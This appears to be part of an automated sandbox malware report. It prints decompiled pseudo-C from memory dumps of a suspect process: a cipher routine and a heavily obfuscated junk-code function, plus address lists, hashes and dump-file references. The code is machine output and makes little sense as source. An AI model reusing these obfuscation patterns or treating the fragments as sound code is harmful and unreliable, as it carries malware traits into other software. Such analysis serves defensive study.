						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}

0x72482fb0
0x72482fbf
0x72482fc8
0x72482fd6
0x72482fda
0x72482fe3
0x72482ff4
0x72482ff7
0x72482ffc
0x72483005
0x72483013
0x72483018
0x72483021
0x72483031
0x72483051
0x72483054
0x72483066
0x7248306b
0x72483080
0x7248309d
0x724830a0
0x724830b1
0x724830c6
0x724830e6
0x724830e9
0x724830fb
0x72483119
0x72483136
0x72483139
0x7248314b
0x72483160
0x72483166
0x7248316e
0x7248316f
0x72483172
0x72483180
0x72483190
0x724831a2
0x724831b4
0x724831d0
0x724831e3
0x724831f0
0x72483201
0x72483218
0x7248323a
0x7248323d
0x7248324e
0x72483269
0x72483280
0x72483283
0x72483295
0x7248329d
0x724832b2
0x724832cf
0x724832d2
0x724832e3
0x72483307
0x72483317
0x7248331a
0x7248332c
0x72483344
0x72483347
0x7248335a
0x72483367
0x72483379
0x72483391
0x724833b4
0x724833b7
0x724833c9
0x724833de
0x724833e4
0x724833e4
0x724833e7
0x724833e7
0x72483180
0x7248344b
0x72483454
0x72483462
0x724834c0
0x724834c9
0x724834d7
0x72483539
0x72483542
0x7248354f
0x72483552
0x7248359e
0x724835aa
0x724835b3
0x724835c0
0x724835c7

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction ID: a6076db455685e47b7ae285aef0444dd4c5150852b79a160be4c357d04482bb9
Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction Fuzzy Hash: CC026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90

Uniqueness

Uniqueness Score: -1.00%

Function 02642622, Relevance: .4, Instructions: 398COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbc9f967424970dce3e62f8ff402c279172c574b7b25ef2b02c111ab1ea9d1f8
Instruction ID: 40808027356b9a3be742a22e4052ac57b8b77cbf8c6282352764ab4132580e26
Opcode Fuzzy Hash: bbc9f967424970dce3e62f8ff402c279172c574b7b25ef2b02c111ab1ea9d1f8
Instruction Fuzzy Hash: 2FE1C0702146518FD72CCF1AC0B0AB2BBE1AF45314B24845EFCD68F692DB35E896DB60

Uniqueness

Uniqueness Score: -1.00%

Function 7249BABE, Relevance: .4, Instructions: 359
COMMONCrypto

Download Yara Rule

C-Code - Quality: 41%

			E7249BABE() {
				char _t72;
				signed int _t74;
				signed char _t75;
				signed char _t79;
				signed int _t82;
				signed int _t84;
				signed int _t89;
				signed int _t92;
				signed int _t97;
				intOrPtr _t99;
				intOrPtr _t100;

				asm("lodsd");
				_pop( *0x6709f12f);
				_push( *0xdc3f399b);
				asm("adc [0x3874878c], esi");
				asm("adc ch, 0x3a");
				_push( *0xdf1b0695);
				asm("rol dword [0x2d58be39], 0x60");
				asm("rol byte [0x5b16408a], 0x6f");
				 *0xd46dc3b3 = _t72;
				_pop(_t82);
				_push( *0xcf2a8d21);
				 *0xde69c888 =  *0xde69c888 | 0x0db55219;
				_t100 =  *0x430e7f91;
				 *0x430e7f91 = _t99;
				_t97 =  *0x7ed727bf |  *0xe823781b;
				asm("sbb bh, [0x6b4b0686]");
				_push(0xe9e54f94);
				 *0x2b47600e =  *0x79e4223f;
				asm("sbb al, 0xe5");
				asm("scasb");
				_t74 = _t72 +  *0x379309f2 - 0xe90dd1d4;
				_t84 = (_t82 |  *0x5076f9c8) ^  *0x23b0de12;
				asm("adc esi, [0x36b36cc2]");
				asm("sbb [0xf4a864ec], edi");
				_t79 = (_t75 & 0x000000b1 | 0x7982a78d) &  *0xbc0281e &  *0xd15981a2;
				asm("cmpsb");
				if((_t74 & 0x127b13db) != 0) {
					__edi = __edi +  *0xf46adf74;
					__eflags = __edi;
					if(__edi <= 0) {
						__ecx =  *0x7c60467f * 0xecd;
						__eflags =  *0xcf0ca8c8 & __eax;
						asm("sbb edx, [0xd7b12d4]");
						__eax =  *0x3f9f366b * 0x91f4;
						 *0x6ad20795 =  *0x6ad20795 >> 0xf;
						asm("adc ebx, 0x105f9198");
						__ebx = __ebx | 0xc53bd305;
						_pop(__ebp);
						 *0x58241212 =  *0x58241212 >> 0xb1;
						 *0x801110c4 =  *0x801110c4 ^ __eax;
						__ebx = __ebx +  *0x79c6365;
						__eflags = __ebx - 0x9f8f81d9;
						_push(__edi);
						 *0x27096061 =  *0x27096061 & __ebp;
						__ebp =  *0xa0fc4bc4;
						 *0xc025eb02 =  *0xc025eb02 | __al;
						 *0x2e2f810a =  *0x2e2f810a - __dl;
						__ecx =  *0x7c60467f * 0xecd - 1;
						__ch = __ch - 0xe5;
						asm("movsb");
						__esp = 0xb30272cf;
						__ebx = __ebx & 0xf961cd17;
						__eflags = __ebx;
						if(__ebx < 0) {
							_pop( *0x9ed82879);
							asm("stosd");
							 *0xbe0c9761 = __ecx;
							__edi = __edi -  *0x36774226;
							__eax = __eax + 1;
							__esp = 0xffffffffff93faef;
							__eflags = 0xb30272cf;
							if(0xb30272cf > 0) {
								__esi =  *0x5f1bef7e * 0x2102;
								__eax = __eax + 1;
								__eflags = __esi -  *0x3af333fc;
								__ecx = __ecx |  *0x488d628b;
								asm("rcr dword [0x396faa93], 0xc8");
								__esp = 0xffffffffff93faef ^  *0xa5cf261;
								__eflags = 0xb30272cf;
								if(0xb30272cf == 0) {
									__edx = __edx + 0x8a113275;
									__eflags = __edx;
									if(__edx == 0) {
										 *0x12f26175 =  *0x12f26175 - __ebp;
										__ebx = __ebx ^ 0x939183cf;
										__ebx = __ebx + 1;
										_pop( *0xe54ac211);
										__ebx = __ebx + 1;
										asm("sbb esi, 0xe026c629");
										__eflags =  *0x4b7b1aee & __esi;
										asm("cmpsb");
										0x20336a3d = 0x20336a3d +  *0xe81e4cb9;
										__ah = __ah &  *0x5550571c;
										__eax = 0x55045fc1;
										__dl = __dl ^ 0x00000002;
										__edi = __edi &  *0x1f8a2a6d;
										__dh =  *0x3b0645f2;
										 *0x950aabc1 =  *0x950aabc1 << 0xa7;
										asm("rcl dword [0x43d7a366], 0x64");
										__ch = __ch ^  *0xdecae082;
										__al =  *0xb91e4e02;
										__eflags = __al & 0x0000003a;
										__ecx = __ecx - 1;
										__al = __al +  *0x79784dc9;
										asm("sbb bh, [0xa66c2f1a]");
										__eax = 0x55045fc1 ^  *0x58f4d93f;
										asm("adc eax, [0x1031dbff]");
										__eflags = __ecx & 0x670e4b13;
										 *0xab36a4dd =  *0xab36a4dd | __esi;
										__ebp = __ebp & 0x56313285;
										 *0x2c9bcb36 =  *0x2c9bcb36 + 0x55045fc1;
										__eflags = __bl & 0x000000c9;
										 *0x44916d67 =  *0x44916d67 ^ __ebx;
										__ebp = __ebp &  *0x9d4b3985;
										asm("adc ebx, [0x24e203ef]");
										__eflags = __cl;
										__dh =  *0x382bd91a;
										 *0x382bd91a =  *0x3b0645f2;
										if(__eflags > 0) {
											asm("adc ebx, [0x9f2c4c76]");
											asm("adc edi, [0x2f76812b]");
											if(__eflags < 0) {
												 *0xd64c1379 =  *0xd64c1379 << 0x8c;
												__ebp = 0x9e7fdf9b;
												 *0xe3120bd1 =  *0xe3120bd1 << 0x18;
												__esp = __esp & 0xdb5cdd35;
												__esi =  *0xc83e99d3;
												_pop(__edi);
												 *0x2b726d94 = __edx;
												__eflags =  *0x705682be & __edi;
												if(( *0x705682be & __edi) != 0) {
													 *0xe0c96274 =  *0xe0c96274 >> 0x5e;
													__ebx = __ebx |  *0xbfeac005;
													__eflags = __ebx;
													__al = 0x8a;
													if(__ebx < 0) {
														__ebx = 0x6ba1dd73;
														_t25 = __esi;
														__esi =  *0x67348d6c;
														 *0x67348d6c = _t25;
														__ch = __ch |  *0xd1449e4;
														 *0xfc2418 =  *0xfc2418 ^ __dh;
														 *0x4e04c82 & __bl = __ah -  *0x3c3ba0d0;
														 *0x357cb1a0 =  *0x357cb1a0 << 0x92;
														asm("adc ch, 0x34");
														asm("ror byte [0xc4cd2ad0], 0xf0");
														asm("stosd");
														asm("adc ecx, 0x9ccf8633");
														__eflags =  *0xd046f63a & __dh;
														asm("cmpsb");
														__eflags =  *0x3c53b905 & __edx;
														_push(__ecx);
														if(( *0x3c53b905 & __edx) < 0) {
															 *0x3db10571 =  *0x3db10571 << 0xaa;
															__eflags =  *0x5714927 & 0x55045fc1;
															asm("sbb esi, [0x5a4b5dbd]");
															if(( *0x5714927 & 0x55045fc1) < 0) {
																asm("sbb ecx, [0x5ab90571]");
																asm("adc edi, [0x5714ec5]");
																__edx = __edx -  *0x50c955c5;
																__eflags = __edx;
																if(__edx < 0) {
																	__eflags = __ecx & 0x54c10571;
																	_push(0x9e7fdf9b);
																	__esi =  *0x94037160 * 0x3e73;
																	__cl = __cl &  *0x64759204;
																	__eflags =  *0x749e040a & __dl;
																	__edi =  *0xa4040a6b * 0x7176;
																	 *0x7fab040a =  *0x7fab040a << 0x9e;
																	__eflags =  *0x7fab040a;
																	if( *0x7fab040a < 0) {
																		__eflags =  *0x6e050a73 & __edx;
																		asm("sbb ecx, [0x71542e3d]");
																		asm("adc esp, [0x49657a05]");
																		_pop(__edx);
																		if(( *0x6e050a73 & __edx) < 0) {
																			__ebx = 0x6ba1dd73 &  *0x537f0571;
																			__eax = __eax - 1;
																			__eflags = 0x55045fc1;
																			_pop(__esp);
																			if(0x55045fc1 < 0) {
																				asm("rcl dword [0x93b60771], 0xb");
																				if(0x55045fc1 >= 0) {
																					__esi =  *0x5a3a8c7c * 0x760;
																					__eflags = __edi -  *0xa7a6b4c4;
																					__esp = __esp -  *0x760583f;
																					 *0xc5b5c5ef =  *0xc5b5c5ef >> 0x24;
																					__ecx = __ecx - 1;
																					_pop(__esi);
																					__esp =  *0x98d20760 * 0x8681;
																					 *0x8605624 =  *0x8605624 << 0x72;
																					__eflags =  *0xd4a7cfdc - __esi;
																					if( *0xd4a7cfdc <= __esi) {
																						asm("adc ebp, [0xc9ab7277]");
																						 *0x68032a08 = 0x8a;
																						_push(0x996fb2fd);
																						asm("adc ch, 0xc9");
																						asm("sbb bh, 0x8");
																						__eflags =  *0x8eafb30 & __dh;
																						asm("sbb esi, 0x8c9a46c");
																						asm("sbb dh, 0xa");
																						__ah = __ah &  *0xa6ef40e3;
																						__esp =  *0x9c99d6b * 0xa7db;
																						asm("adc eax, [0x3055a78f]");
																						asm("sbb esp, 0x9c03d35");
																						L1();
																						__esi = __esi |  *0xc330c5e8;
																						__eflags =  *0x25f20067 & __edi;
																						__ecx = __ecx +  *0x133809c0;
																						asm("rcl byte [0x38d43682], 0x7c");
																						__eflags =  *0xac03a1f - 0x9e7fdf9b;
																						__ebx = __ebx - 0x9c8593dc;
																						__esp = 0xab431c6c +  *0x9c99d6b * 0xa7db;
																						asm("adc edx, [0x730bb30b]");
																						 *0xe331892a =  *0xe331892a + __ah;
																						asm("sbb [0x9cc297d0], ch");
																						asm("sbb esi, [0x24087fd4]");
																						__edx -  *0x8cdbbbd5 =  *0x11c9a56e & __edx;
																						if(( *0x11c9a56e & __edx) > 0) {
																							__eax =  *0x434e397e * 0x8005;
																							 *0x3200333f =  *0x3200333f & 0x6ba1dd73;
																							__al = 0xeb;
																							__eax =  *0x434e397e * 0x8005 - 1;
																							__esi = __esi ^  *0xe961f499;
																							__eflags = __esi;
																							if(__esi >= 0) {
																								 *0xb3fc1478 =  *0xb3fc1478 + __edx;
																								__esp = __esp +  *0x235cb837;
																								 *0x73e3921a =  *0x73e3921a << 9;
																								 *0x7922e1e3 =  *0x7922e1e3 << 0xd2;
																								__eflags =  *0x3c0be221 & __edx;
																								if(( *0x3c0be221 & __edx) < 0) {
																									asm("sbb [0xef127a73], ecx");
																									asm("adc edx, 0xe584c7a9");
																									__esp = __esp & 0xf5419cf7;
																									__eflags = __esp;
																									if(__esp >= 0) {
																										 *0xa64d0d70 & 0x9e7fdf9b = __esi & 0x7b01d217;
																										__eflags =  *0xa295c0b & __ecx;
																										 *0x44d0d01a =  *0x44d0d01a << 0xdb;
																										__eflags =  *0x44d0d01a;
																										if( *0x44d0d01a < 0) {
																											__edx =  *0x7fc10c7d * 0x9906;
																											__edx =  *0x7fc10c7d * 0x00009906 |  *0x4b3add3b;
																											 *0x68fd0cfd =  *0x68fd0cfd - __eax;
																											__eflags = __edi - 0x2e3b7292;
																											__ebx = __ebx +  *0xf6273d31;
																											asm("rcr dword [0xf107bdef], 0xa8");
																											asm("stosd");
																											asm("sbb [0x9d85b205], edi");
																											__esp =  *0x180a1660 * 0x7f87;
																											 *0x322b751f =  *0x322b751f - __edx;
																											 *0x5940e838 =  *0x5940e838 >> 0x44;
																											0xffffffff67dbf08e = 0xffffffff67dbf08d;
																											asm("adc bh, 0x8");
																											__ebp =  *0x90288b6f;
																											 *0x90288b6f = 0xffffffff67dbf08d;
																											__edi = __edi | 0x20bf1211;
																											 *0xf8f352ba =  *0xf8f352ba & 0x6ba1dd73;
																											__ebx = __ebx +  *0xbb5a0e66;
																											__eflags = 0x6ba1dd73;
																											if(0x6ba1dd73 > 0) {
																												__edx = __edx ^  *0x9cc56176;
																												__eflags = __edx;
																												asm("lodsb");
																												if(__edx >= 0) {
																													__edx = __edx +  *0x5a3c1c78;
																													__eflags =  *0x3188bfd1 & __ecx;
																													_push( *0x883dde21);
																													__ebp = __ebp & 0xee13bdbf;
																													asm("rcl dword [0xdb0bf5f3], 0x3a");
																													__ecx = __ecx &  *0xf267c498;
																													 *0x96106dd2 =  *0x96106dd2 | __cl;
																													__edx = 0x7f78e21e;
																													__ebx = __ebx + 1;
																													_pop(__ecx);
																													__eflags = 0x6ba1dd73 -  *0x2b8e070e;
																													asm("sbb al, 0x8a");
																													__edx = __edx | 0x6b314923;
																													_pop(__esi);
																													__eflags =  *0x96229c99 & __esp;
																													__ch = __ch + 0xb4;
																													__ebx = __ebx |  *0xe5ac1719;
																													__ebp = __ebp -  *0x64ab4ca3;
																													asm("rol dword [0xff9d67c1], 0xc");
																													 *0xaa091a9 =  *0xaa091a9 - __edi;
																													_pop(__esi);
																													asm("sbb ecx, [0xbfa447fe]");
																													 *0xcc98a66f =  *0xcc98a66f >> 0xcc;
																													__esp & 0x79b277fc =  *0x3454893b & __ebp;
																													 *0x657d0e00 = __bh;
																													__eflags =  *0x41297105 & __ecx;
																													__ecx = __ecx ^  *0xe84ddaee;
																													__ebp = __ebp +  *0xb068fced;
																													__eflags = __esp -  *0x2060ed29;
																													if(__esp <  *0x2060ed29) {
																														__esp =  *0x18c2057d * 0x5cab;
																														__eflags = __esp;
																														if(__esp > 0) {
																															__ebx =  *0xa513e7e * 0x5c7c;
																															__eax = __eax &  *0x83a8cfdc;
																															__edi = __edi |  *0x94a8083d;
																															__cl = __cl | 0x00000086;
																															__eax = __eax - 1;
																															asm("rol byte [0x71877ee7], 0xe");
																															asm("sbb ebp, 0xa40e0c83");
																															asm("rcr dword [0xe333353f], 0x2");
																															asm("adc ecx, [0xd037a211]");
																															 *0x2718db04 =  *0x2718db04 - 0x8a;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L1:
				asm("sbb esp, [0x91ed4609]");
				 *0x4f9ebbde =  *0x4f9ebbde | _t97;
				 *0x4f0dc00c =  *0x4f0dc00c & _t84;
				_t92 = _t92 &  *0xfdf527f5;
				asm("adc dh, [0xe865f682]");
				_t79 = _t79 | 0x000000e0;
				_pop(_t89);
				asm("sbb edi, [0x6341631f]");
				_push(_t74);
				asm("rol dword [0x44580c66], 0xaf");
				asm("adc ebp, [0x5c9b3ff]");
				if(((_t89 |  *0x180c5fba) & 0x3c693793) < 0) {
					_t79 = _t79 | 0x44830d71;
					asm("cmpsw");
					_t74 = _t74 + 1;
					 *0xeb8796f7 =  *0xeb8796f7 - _t100;
					_push(_t79);
					if( *0xeb8796f7 < 0) {
						asm("sbb ecx, [0x5f8c8e71]");
						asm("rcr dword [0xf191e413], 0x15");
						asm("adc esi, [0xa2c14a91]");
						asm("sbb esi, [0x959e7f2f]");
						asm("sbb edi, [0x6971c66e]");
						_t79 = _t79 ^  *0x21d9a8f9;
						_t74 = _t74 - 0xd7;
						_t92 = _t92 +  *0x7bb225ba &  *0x84dbc09;
						_pop(0xdb55218);
						 *0x6b5a6b28 =  *0x6b5a6b28 & _t79;
						asm("sbb ecx, [0x247f05c0]");
						_t97 = _t97 -  *0x3be23cb8 + 1;
						_t84 = 0x00000010 -  *0xa714619 ^  *0xb2fee9ec;
						_push( *0x194e49da);
						 *0x15750ab3 =  *0x15750ab3 >> 0x8e;
						_t11 = _t100;
						_t100 =  *0x46ef4e9e;
						 *0x46ef4e9e = _t11;
						 *0xb3184a0a =  *0xb3184a0a ^ _t79;
						 *0x63d6250f =  *0x63d6250f ^ 0xdb55218;
					}
				}
				goto L1;
			}

0x7249bac4
0x7249bac5
0x7249bacd
0x7249bad3
0x7249badc
0x7249badf
0x7249baf1
0x7249baf8
0x7249baff
0x7249bb1e
0x7249bb1f
0x7249bb37
0x7249bb3d
0x7249bb3d
0x7249bb43
0x7249bb4a
0x7249bb50
0x7249bb55
0x7249bb5c
0x7249bb64
0x7249bb65
0x7249bb6b
0x7249bb71
0x7249bb77
0x7249bb7d
0x7249bb89
0x7249bb8a
0x7249bb90
0x7249bb90
0x7249bb96
0x7249bb9c
0x7249bba6
0x7249bbac
0x7249bbb2
0x7249bbbc
0x7249bbc3
0x7249bbc9
0x7249bbcf
0x7249bbd0
0x7249bbd7
0x7249bbdd
0x7249bbe3
0x7249bbe9
0x7249bbea
0x7249bbf0
0x7249bbf6
0x7249bbfc
0x7249bc02
0x7249bc03
0x7249bc06
0x7249bc07
0x7249bc0c
0x7249bc0c
0x7249bc12
0x7249bc18
0x7249bc1e
0x7249bc1f
0x7249bc25
0x7249bc2b
0x7249bc2c
0x7249bc2c
0x7249bc32
0x7249bc38
0x7249bc42
0x7249bc43
0x7249bc49
0x7249bc4f
0x7249bc56
0x7249bc56
0x7249bc5c
0x7249bc62
0x7249bc62
0x7249bc68
0x7249bc6e
0x7249bc74
0x7249bc7a
0x7249bc7c
0x7249bc82
0x7249bc83
0x7249bc89
0x7249bc8f
0x7249bc96
0x7249bc9c
0x7249bca2
0x7249bca7
0x7249bcaa
0x7249bcb0
0x7249bcb6
0x7249bcbd
0x7249bcc4
0x7249bcca
0x7249bccf
0x7249bcd1
0x7249bcd2
0x7249bcd8
0x7249bcde
0x7249bce4
0x7249bcea
0x7249bcf0
0x7249bcf6
0x7249bcfc
0x7249bd02
0x7249bd05
0x7249bd0b
0x7249bd11
0x7249bd17
0x7249bd1a
0x7249bd1a
0x7249bd20
0x7249bd26
0x7249bd2c
0x7249bd32
0x7249bd38
0x7249bd3f
0x7249bd44
0x7249bd4b
0x7249bd51
0x7249bd57
0x7249bd58
0x7249bd5e
0x7249bd64
0x7249bd6a
0x7249bd71
0x7249bd71
0x7249bd77
0x7249bd79
0x7249bd7f
0x7249bd85
0x7249bd85
0x7249bd85
0x7249bd8b
0x7249bd91
0x7249bd9d
0x7249bda3
0x7249bdaa
0x7249bdad
0x7249bdb4
0x7249bdb5
0x7249bdbb
0x7249bdc1
0x7249bdc2
0x7249bdc8
0x7249bdc9
0x7249bdcf
0x7249bdd6
0x7249bddc
0x7249bde2
0x7249bde8
0x7249bdee
0x7249bdf4
0x7249bdf4
0x7249bdfa
0x7249be00
0x7249be06
0x7249be07
0x7249be11
0x7249be17
0x7249be1d
0x7249be27
0x7249be27
0x7249be2e
0x7249be34
0x7249be3a
0x7249be40
0x7249be46
0x7249be47
0x7249be4d
0x7249be53
0x7249be53
0x7249be54
0x7249be55
0x7249be5b
0x7249be62
0x7249be68
0x7249be72
0x7249be78
0x7249be7e
0x7249be85
0x7249be86
0x7249be87
0x7249be91
0x7249be98
0x7249be9e
0x7249bea4
0x7249beaa
0x7249beaf
0x7249beb4
0x7249beb7
0x7249beba
0x7249bec1
0x7249bec7
0x7249beca
0x7249bed0
0x7249beda
0x7249bee0
0x7249bee6
0x7249beeb
0x7249bef1
0x7249bef7
0x7249befd
0x7249bf04
0x7249bf0a
0x7249bf10
0x7249bf16
0x7249bf1c
0x7249bf22
0x7249bf28
0x7249bf34
0x7249bf3a
0x7249bf40
0x7249bf4a
0x7249bf50
0x7249bf52
0x7249bf53
0x7249bf53
0x7249bf59
0x7249bf5f
0x7249bf65
0x7249bf6b
0x7249bf72
0x7249bf79
0x7249bf7f
0x7249bf85
0x7249bf8c
0x7249bf92
0x7249bf92
0x7249bf98
0x7249bfa4
0x7249bfaa
0x7249bfb0
0x7249bfb0
0x7249bfb7
0x7249bfbd
0x7249bfc7
0x7249bfcd
0x7249bfd3
0x7249bfd9
0x7249bfdf
0x7249bfe6
0x7249bfe7
0x7249bfed
0x7249bff7
0x7249bffd
0x7249c00a
0x7249c00b
0x7249c00e
0x7249c00e
0x7249c014
0x7249c01a
0x7249c020
0x7249c020
0x7249c026
0x7249c02c
0x7249c02c
0x7249c032
0x7249c033
0x7249c039
0x7249c03f
0x7249c045
0x7249c04b
0x7249c056
0x7249c05d
0x7249c063
0x7249c069
0x7249c06a
0x7249c06b
0x7249c06c
0x7249c072
0x7249c074
0x7249c07a
0x7249c07b
0x7249c081
0x7249c084
0x7249c08a
0x7249c090
0x7249c097
0x7249c09d
0x7249c09e
0x7249c0a4
0x7249c0b1
0x7249c0b7
0x7249c0bd
0x7249c0c3
0x7249c0c9
0x7249c0cf
0x7249c0d5
0x7249c0db
0x7249c0db
0x7249c0e5
0x7249c0eb
0x7249c0f5
0x7249c0fb
0x7249c107
0x7249c10a
0x7249c10b
0x7249c112
0x7249c118
0x7249c11f
0x7249c125
0x7249c125
0x7249c0e5
0x7249c0d5
0x7249c033
0x7249c026
0x7249bfb7
0x7249bf98
0x7249bf7f
0x7249bf59
0x7249bf3a
0x7249be9e
0x7249be62
0x7249be55
0x7249be47
0x7249be2e
0x7249bdfa
0x7249bde2
0x7249bdc9
0x7249bd79
0x7249bd64
0x7249bd32
0x7249bd20
0x7249bc68
0x7249bc5c
0x7249bc32
0x7249bc12
0x7249bb96
0x7249b8d6
0x7249b8d6
0x7249b8dc
0x7249b8e2
0x7249b8e8
0x7249b8ee
0x7249b8f4
0x7249b8f7
0x7249b904
0x7249b90a
0x7249b911
0x7249b918
0x7249b924
0x7249b926
0x7249b92c
0x7249b92e
0x7249b92f
0x7249b935
0x7249b936
0x7249b938
0x7249b93e
0x7249b945
0x7249b94b
0x7249b951
0x7249b97d
0x7249b983
0x7249b989
0x7249b98f
0x7249b990
0x7249b996
0x7249b9a2
0x7249b9a3
0x7249b9a9
0x7249b9af
0x7249b9b6
0x7249b9b6
0x7249b9b6
0x7249b9bc
0x7249b9c2
0x7249b9c2
0x7249b936
0x00000000

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a9b489b7467d5a8fe39e8484c31faf161e2bcc9898a4846457c8fad45bb082d
Instruction ID: d799ac3e71c25c865e6b68261c0f893c535e28c50d3daed6c7a03c058ad521f7
Opcode Fuzzy Hash: 9a9b489b7467d5a8fe39e8484c31faf161e2bcc9898a4846457c8fad45bb082d
Instruction Fuzzy Hash: 8A029773908788CFE706CF38D99AB413FB2F79A724B09425EC8A153596D734251ACF89

Uniqueness

Uniqueness Score: -1.00%

Function 025AC7BC, Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
